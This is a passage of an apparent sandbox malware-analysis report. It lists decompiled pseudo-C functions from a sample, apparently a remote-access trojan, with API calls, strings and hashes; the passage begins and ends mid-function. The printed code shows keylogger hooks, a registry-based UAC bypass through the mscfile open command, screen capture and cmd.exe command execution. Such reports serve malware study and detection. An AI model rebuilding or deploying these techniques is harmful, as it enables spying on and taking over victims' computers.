                              													_push(_t202);
                              													_v440 = _t214;
                              													while(1) {
                              														__eflags = _t170 - _t155;
                              														if(_t170 == _t155) {
                              															break;
                              														}
                              														_t113 =  *_t170;
                              														__eflags = _t113 - 0x2f;
                              														if(_t113 != 0x2f) {
                              															__eflags = _t113 - 0x5c;
                              															if(_t113 != 0x5c) {
                              																__eflags = _t113 - 0x3a;
                              																if(_t113 != 0x3a) {
                              																	_t170 = L0044ED70(_t155, _t170);
                              																	continue;
                              																}
                              															}
                              														}
                              														break;
                              													}
                              													_t194 =  *_t170;
                              													__eflags = _t194 - 0x3a;
                              													if(_t194 != 0x3a) {
                              														L47:
                              														_t203 = 0;
                              														__eflags = _t194 - 0x2f;
                              														if(_t194 == 0x2f) {
                              															L51:
                              															_t115 = 1;
                              															__eflags = 1;
                              														} else {
                              															__eflags = _t194 - 0x5c;
                              															if(_t194 == 0x5c) {
                              																goto L51;
                              															} else {
                              																__eflags = _t194 - 0x3a;
                              																if(_t194 == 0x3a) {
                              																	goto L51;
                              																} else {
                              																	_t115 = 0;
                              																}
                              															}
                              														}
                              														asm("sbb eax, eax");
                              														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                              														E00431810(_t203,  &_v336, _t203, 0x140);
                              														_t228 = _t227 + 0xc;
                              														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                              														_t123 = _v340;
                              														__eflags = _t215 - 0xffffffff;
                              														if(_t215 != 0xffffffff) {
                              															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                              															__eflags = _t174;
                              															_v348 = _t174 >> 2;
                              															do {
                              																__eflags = _v336.cFileName - 0x2e;
                              																if(_v336.cFileName != 0x2e) {
                              																	L64:
                              																	_push(_t123);
                              																	_push(_v344);
                              																	_t123 =  &(_v336.cFileName);
                              																	_push(_t155);
                              																	_push(_t123);
                              																	L28();
                              																	_t228 = _t228 + 0x10;
                              																	__eflags = _t123;
                              																	if(_t123 != 0) {
                              																		goto L54;
                              																	} else {
                              																		goto L65;
                              																	}
                              																} else {
                              																	_t178 = _v291;
                              																	__eflags = _t178;
                              																	if(_t178 == 0) {
                              																		goto L65;
                              																	} else {
                              																		__eflags = _t178 - 0x2e;
                              																		if(_t178 != 0x2e) {
                              																			goto L64;
                              																		} else {
                              																			__eflags = _v290;
                              																			if(_v290 == 0) {
                              																				goto L65;
                              																			} else {
                              																				goto L64;
                              																			}
                              																		}
                              																	}
                              																}
                              																goto L58;
                              																L65:
                              																_t128 = FindNextFileA(_t215,  &_v336);
                              																__eflags = _t128;
                              																_t123 = _v340;
                              															} while (_t128 != 0);
                              															_t195 =  *_t123;
                              															_t179 = _v348;
                              															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                              															__eflags = _t179 - _t131;
                              															if(_t179 != _t131) {
                              																E0044E990(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00445501);
                              															}
                              														} else {
                              															_push(_t123);
                              															_push(_t203);
                              															_push(_t203);
                              															_push(_t155);
                              															L28();
                              															L54:
                              															_t203 = _t123;
                              														}
                              														__eflags = _t215 - 0xffffffff;
                              														if(_t215 != 0xffffffff) {
                              															FindClose(_t215);
                              														}
                              													} else {
                              														__eflags = _t170 -  &(_t155[1]);
                              														if(_t170 ==  &(_t155[1])) {
                              															goto L47;
                              														} else {
                              															_push(_t214);
                              															_push(0);
                              															_push(0);
                              															_push(_t155);
                              															L28();
                              														}
                              													}
                              													L58:
                              													__eflags = _v16 ^ _t222;
                              													return E0042F61B(_v16 ^ _t222);
                              												} else {
                              													goto L34;
                              												}
                              											}
                              										} else {
                              											_t139 = 0xc;
                              											L36:
                              											return _t139;
                              										}
                              									} else {
                              										goto L22;
                              									}
                              									goto L68;
                              									L22:
                              									_t196 = _v16;
                              									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                              									_t199 = _t199 + 4;
                              									_t192 = _t196 + _v12;
                              									_v16 = _t196 + _v12;
                              									__eflags = _t199 - _t151;
                              								} while (_t199 != _t151);
                              								goto L23;
                              							}
                              						} else {
                              							_t200 = _t199 | 0xffffffff;
                              							L24:
                              							L0043EE85(0);
                              							goto L25;
                              						}
                              					} else {
                              						while(1) {
                              							_v8 = 0x3f2a;
                              							_v6 = _t160;
                              							_t147 = L0044ED30( *_t208,  &_v8);
                              							__eflags = _t147;
                              							if(_t147 != 0) {
                              								_push( &_v36);
                              								_push(_t147);
                              								_push( *_t208);
                              								L38();
                              								_t224 = _t224 + 0xc;
                              							} else {
                              								_t147 =  &_v36;
                              								_push(_t147);
                              								_push(0);
                              								_push(0);
                              								_push( *_t208);
                              								L28();
                              								_t224 = _t224 + 0x10;
                              							}
                              							_t200 = _t147;
                              							__eflags = _t200;
                              							if(_t200 != 0) {
                              								break;
                              							}
                              							_t208 = _t208 + 4;
                              							_t160 = 0;
                              							__eflags =  *_t208;
                              							if( *_t208 != 0) {
                              								continue;
                              							} else {
                              								_t151 = _v336.cAlternateFileName;
                              								_t199 = _v36;
                              								goto L9;
                              							}
                              							goto L68;
                              						}
                              						L25:
                              						E004458C3( &_v36);
                              						_t91 = _t200;
                              						goto L26;
                              					}
                              				} else {
                              					_t148 = L00439E14();
                              					_t219 = 0x16;
                              					 *_t148 = _t219;
                              					E0043626D();
                              					_t91 = _t219;
                              					L26:
                              					return _t91;
                              				}
                              				L68:
                              			}
                              Instruction address range of the listing above: 0x0044551e to 0x004458bb (the report pairs each pseudo-C line with its address; that per-line column is collapsed here)

                              APIs
                              • _strpbrk.LIBCMT ref: 00445568
                              • _free.LIBCMT ref: 00445685
                                • Part of subcall function 0043629A: IsProcessorFeaturePresent.KERNEL32(00000017,0043626C,0042F919,?,?,?,0042F919,00000016,?,?,00436279,00000000,00000000,00000000,00000000,00000000), ref: 0043629C
                                • Part of subcall function 0043629A: GetCurrentProcess.KERNEL32(C0000417,?,0042F919), ref: 004362BE
                                • Part of subcall function 0043629A: TerminateProcess.KERNEL32(00000000,?,0042F919), ref: 004362C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                              • String ID: *?$.
                              • API String ID: 2812119850-3972193922
                              • Opcode ID: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
                              • Instruction ID: 9a964df7e2ccefeecbf26bda24bf2b163005b59dfbd6a4608a1e3f741a932d91
                              • Opcode Fuzzy Hash: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
                              • Instruction Fuzzy Hash: AF51E371E0060AAFEF10CFA9C881ABEB7B5EF58314F25416EE454E7301EA799E018B54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0041510D(void* __ecx, void* __edx, void* __eflags) {
                              				char _v1048;
                              				char _v1056;
                              				char _v1092;
                              				void* _v1096;
                              				char _v1112;
                              				char _v1120;
                              				void* _v1124;
                              				void* _v1136;
                              				char _v1144;
                              				char _v1152;
                              				char _v1156;
                              				void* _v1160;
                              				char _v1184;
                              				char _v1200;
                              				void* _v1204;
                              				char _v1224;
                              				char _v1232;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				intOrPtr* _t39;
                              				void* _t54;
                              				void* _t57;
                              				void* _t60;
                              				void* _t67;
                              				void* _t73;
                              				char* _t84;
                              				char* _t86;
                              				void* _t120;
                              				void* _t121;
                              				void* _t123;
                              				intOrPtr* _t124;
                              				signed int _t128;
                              				void* _t130;
                              
                              				_t133 = __eflags;
                              				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
                              				_t121 = __ecx;
                              				_t74 = __edx;
                              				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
                              				L00401ED0();
                              				E004142A5( &_v1120, __edx, __eflags, 0);
                              				_t84 =  &_v1120;
                              				_t39 =  *0x46bd10(L00401F75(_t84), E00402469(), _t120, _t123, _t73);
                              				_t124 = _t39;
                              				L00413DBA( &_v1144, _t124);
                              				_t86 = L"image/png";
                              				E00414611(_t86,  &_v1112);
                              				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
                              				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
                              				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
                              					E004020B5(__edx,  &_v1224);
                              					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
                              					_t135 = _t54;
                              					if(_t54 != 0) {
                              						DeleteFileW(L00401ECB( &_v1200));
                              						_t57 = E00402469();
                              						L00405A2F( &_v1048, L00401F75(0x46c560), _t57);
                              						_t60 = E00402469();
                              						L00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
                              						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
                              						L00401ED0();
                              						_t67 = L00401ECB( &_v1120);
                              						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
                              						E004173A6(_t67);
                              						L00401ED0();
                              						L00401FA7();
                              					}
                              					_t48 = L00401FA7();
                              				}
                              				L00413DE0(_t48,  &_v1152);
                              				L00401FA7();
                              				return L00401ED0();
                              			}

                              APIs
                                • Part of subcall function 004142A5: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                                • Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                                • Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0
                                • Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
                              • String ID: dat$image/png$png
                              • API String ID: 4253173196-186023265
                              • Opcode ID: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
                              • Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
                              • Opcode Fuzzy Hash: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
                              • Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E0043B909(void* __ecx, void* __edx, intOrPtr _a4) {
                              				signed int _v8;
                              				void* _v12;
                              				char _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t36;
                              				struct HINSTANCE__* _t37;
                              				struct HINSTANCE__* _t43;
                              				intOrPtr* _t44;
                              				intOrPtr* _t45;
                              				CHAR* _t49;
                              				struct HINSTANCE__* _t50;
                              				void* _t52;
                              				struct HINSTANCE__* _t55;
                              				intOrPtr* _t59;
                              				struct HINSTANCE__* _t64;
                              				intOrPtr _t65;
                              
                              				_t52 = __ecx;
                              				if(_a4 == 2 || _a4 == 1) {
                              					L00445E89(_t52);
                              					GetModuleFileNameA(0, 0x46b3c8, 0x104);
                              					_t49 =  *0x46ba3c; // 0x31734b8
                              					 *0x46ba44 = 0x46b3c8;
                              					if(_t49 == 0 ||  *_t49 == 0) {
                              						_t49 = 0x46b3c8;
                              					}
                              					_v8 = 0;
                              					_v16 = 0;
                              					L0043BA2D(_t52, _t49, 0, 0,  &_v8,  &_v16);
                              					_t64 = L0043BBA2(_v8, _v16, 1);
                              					if(_t64 != 0) {
                              						L0043BA2D(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                              						if(_a4 != 1) {
                              							_v12 = 0;
                              							_push( &_v12);
                              							_t50 = E004459A4(_t49, 0, _t64, _t64);
                              							if(_t50 == 0) {
                              								_t59 = _v12;
                              								_t55 = 0;
                              								_t36 = _t59;
                              								if( *_t59 == 0) {
                              									L15:
                              									_t37 = 0;
                              									 *0x46ba30 = _t55;
                              									_v12 = 0;
                              									_t50 = 0;
                              									 *0x46ba34 = _t59;
                              									L16:
                              									L0043EE85(_t37);
                              									_v12 = 0;
                              									goto L17;
                              								} else {
                              									goto L14;
                              								}
                              								do {
                              									L14:
                              									_t36 = _t36 + 4;
                              									_t55 =  &(_t55->i);
                              								} while ( *_t36 != 0);
                              								goto L15;
                              							}
                              							_t37 = _v12;
                              							goto L16;
                              						}
                              						 *0x46ba30 = _v8 - 1;
                              						_t43 = _t64;
                              						_t64 = 0;
                              						 *0x46ba34 = _t43;
                              						goto L10;
                              					} else {
                              						_t44 = L00439E14();
                              						_push(0xc);
                              						_pop(0);
                              						 *_t44 = 0;
                              						L10:
                              						_t50 = 0;
                              						L17:
                              						L0043EE85(_t64);
                              						return _t50;
                              					}
                              				} else {
                              					_t45 = L00439E14();
                              					_t65 = 0x16;
                              					 *_t45 = _t65;
                              					E0043626D();
                              					return _t65;
                              				}
                              			}

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0043B949
                              • _free.LIBCMT ref: 0043BA14
                              • _free.LIBCMT ref: 0043BA1E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$FileModuleName
                              • String ID: C:\Windows\SysWOW64\mobsync.exe
                              • API String ID: 2506810119-2325505231
                              • Opcode ID: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
                              • Instruction ID: 660ae339c78687f970f45cd6768a2251d83b04d254988ce5d7869c99c620db43
                              • Opcode Fuzzy Hash: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
                              • Instruction Fuzzy Hash: BD3173B1A01618AFDB21DF999881BAFBBA8EF89710F10506BE604D7311D7744E41CBD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SystemParametersInfoW.USER32 ref: 0041795D
                                • Part of subcall function 00410497: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 004104A6
                                • Part of subcall function 00410497: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,004106BD,?,00000000), ref: 004104CE
                                • Part of subcall function 00410497: RegCloseKey.ADVAPI32(00000000,?,?,?,004106BD,?,00000000), ref: 004104D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateInfoParametersSystemValue
                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                              • API String ID: 4127273184-3576401099
                              • Opcode ID: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
                              • Instruction ID: fa13f98970d9a9ebbc3df1aa31e4731e3fb9772d8354761676ac4eeabfab18a3
                              • Opcode Fuzzy Hash: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
                              • Instruction Fuzzy Hash: A5116332B8434072D818307A4E5FBAF18159746F61FA0416BB7013A6C6E8DF4A9943DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E00409520(void* __ebx, struct HHOOK__** __ecx) {
                              				char _v28;
                              				void* __edi;
                              				struct HHOOK__** _t29;
                              				void* _t30;
                              				void* _t31;
                              
                              				_t19 = __ebx;
                              				_t29 = __ecx;
                              				_t35 =  *((char*)(__ecx + 0x4a));
                              				if( *((char*)(__ecx + 0x4a)) == 0) {
                              					__eflags = 0;
                              					return 0;
                              				}
                              				_t28 = "Online Keylogger Stopped";
                              				E00402064(__ebx,  &_v28, "Online Keylogger Stopped");
                              				_t31 = _t30 - 0x18;
                              				L00416C32(_t31,  &_v28);
                              				E00409636(__ebx, _t29, _t35);
                              				L00401FA7();
                              				_t32 = _t31 - 0x18;
                              				E00402064(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
                              				E00402064(_t19, _t32 - 0x18, "[Info]");
                              				E004165D8(_t19, _t28);
                              				_t29[0x12] = 0;
                              				CloseHandle(_t29[0xf]);
                              				if(_t29[0x12] == 0 &&  *_t29 != 0) {
                              					UnhookWindowsHookEx( *_t29);
                              					 *_t29 =  *_t29 & 0x00000000;
                              				}
                              				return 1;
                              			}

                              APIs
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • CloseHandle.KERNEL32(?), ref: 00409583
                              • UnhookWindowsHookEx.USER32 ref: 00409596
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                              • String ID: Online Keylogger Stopped$[Info]
                              • API String ID: 3650414481-1913360614
                              • Opcode ID: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
                              • Instruction ID: 5d632db0778c86123480600154419b6f65a677741df4c82794f5c8cb08535fc7
                              • Opcode Fuzzy Hash: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
                              • Instruction Fuzzy Hash: 4E01D631A003006BD7257735C90B77E7B615B41305F80006EE941221D3DA7D5D59C3DA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C49C
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Exception@8Throw
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 2005118841-1866435925
                              • Opcode ID: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
                              • Instruction ID: 00d2e120a14ed07e696206c725bb703fde342002c12277e6dbbb730505fe52c1
                              • Opcode Fuzzy Hash: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
                              • Instruction Fuzzy Hash: 0001D671580208FAD710EB51C8E3F7E7358AF14705F20826FB915791C3EA7C6542866F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
                              				void* _t11;
                              
                              				_t41 = __eflags;
                              				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
                              				_t35 = L"/C ";
                              				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
                              				L00401ED0();
                              				L00401ED0();
                              				L00401E54( &_a16, _t35);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
                              • Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
                              • Opcode Fuzzy Hash: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
                              • Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E0041033E(void* __ecx) {
                              				void* _v8;
                              				int _v12;
                              				char _v2060;
                              				void* _t17;
                              				void* _t21;
                              
                              				_v12 = 0x400;
                              				_t21 = __ecx;
                              				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
                              					_push(0x45f714);
                              				} else {
                              					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
                              					RegCloseKey(_v8);
                              					_push( &_v2060);
                              				}
                              				E0040425F(_t17, _t21);
                              				return _t21;
                              			}

                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041038C
                              Strings
                              • http\shell\open\command, xrefs: 0041035E
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: http\shell\open\command
                              • API String ID: 3677997916-1487954565
                              • Opcode ID: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
                              • Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
                              • Opcode Fuzzy Hash: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
                              • Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0041053C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
                              				void* _v8;
                              				signed int _t17;
                              				long _t20;
                              				signed int _t22;
                              				signed int _t23;
                              
                              				_push(__ecx);
                              				_push(_t22);
                              				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
                              					_t23 = 0;
                              				} else {
                              					_t17 = E00402469();
                              					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, L00401ECB( &_a8), 2 + _t17 * 2);
                              					RegCloseKey(_v8);
                              					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
                              				}
                              				L00401ED0();
                              				return _t23;
                              			}

                              APIs
                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046BB08), ref: 00410547
                              • RegSetValueExW.ADVAPI32(0046BB08,0045F714,00000000,00000000,00000000,00000000,0045F714,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410576
                              • RegCloseKey.ADVAPI32(0046BB08,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410581
                              Strings
                              • Software\Classes\mscfile\shell\open\command, xrefs: 00410545
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: Software\Classes\mscfile\shell\open\command
                              • API String ID: 1818849710-505396733
                              • Opcode ID: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
                              • Instruction ID: b35e326baa4341fdc783df4f92487e38f7185df5fc588de708a2e43aa04f4aed
                              • Opcode Fuzzy Hash: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
                              • Instruction Fuzzy Hash: B3F0A932400218BBCF109FA1ED0AEEE776CEB04782F00462ABD05A60A1EA759F14DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00401397() {
                              				_Unknown_base(*)()* _t2;
                              
                              				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                              				 *0x46c5cc = _t2;
                              				return _t2;
                              			}

                              APIs
                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013A1
                              • GetProcAddress.KERNEL32(00000000), ref: 004013A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: GetCursorInfo$User32.dll
                              • API String ID: 1646373207-2714051624
                              • Opcode ID: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
                              • Instruction ID: d3bda5949b9d116e285d55fbc59b8e5d8e53a04c9e9cedd27b105f6a33248ad0
                              • Opcode Fuzzy Hash: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
                              • Instruction Fuzzy Hash: 31B092F1580B00AB87007FA0AC0D9193EA4F648743F2045BAF042929A1EBB891148F1F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00401452() {
                              				_Unknown_base(*)()* _t2;
                              
                              				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                              				 *0x46ca68 = _t2;
                              				return _t2;
                              			}

                              APIs
                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040145C
                              • GetProcAddress.KERNEL32(00000000), ref: 00401463
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetLastInputInfo$User32.dll
                              • API String ID: 2574300362-1519888992
                              • Opcode ID: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
                              • Instruction ID: a8f1c5a083774e383246da89c7c1d95a8e0abaf71fe038d6a5d2766fcd81b51d
                              • Opcode Fuzzy Hash: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
                              • Instruction Fuzzy Hash: 69B092F4641B00AB8700AFE0AC8DA053EA8A644B47F2002A3B09196961EBB88244CB1E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040146F() {
                              				_Unknown_base(*)()* _t2;
                              
                              				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                              				 *0x46ca6c = _t2;
                              				return _t2;
                              			}

                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401479
                              • GetProcAddress.KERNEL32(00000000), ref: 00401480
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetConsoleWindow$kernel32.dll
                              • API String ID: 2574300362-100875112
                              • Opcode ID: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
                              • Instruction ID: 5a97185418b63760bbf8986895f03466fab36a6e56cd4c50a02a3f426b50f970
                              • Opcode Fuzzy Hash: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
                              • Instruction Fuzzy Hash: C3B092B5681B00ABCA106FA2AD0DA0A3E68A604B43B1044A2F15582561EAB882048F1E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00442490(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				unsigned int _v20;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				char _v40;
                              				intOrPtr _v48;
                              				char _v52;
                              				void* __ebx;
                              				void* __edi;
                              				void* _t86;
                              				signed int _t92;
                              				signed int _t93;
                              				signed int _t94;
                              				signed int _t100;
                              				void* _t101;
                              				void* _t102;
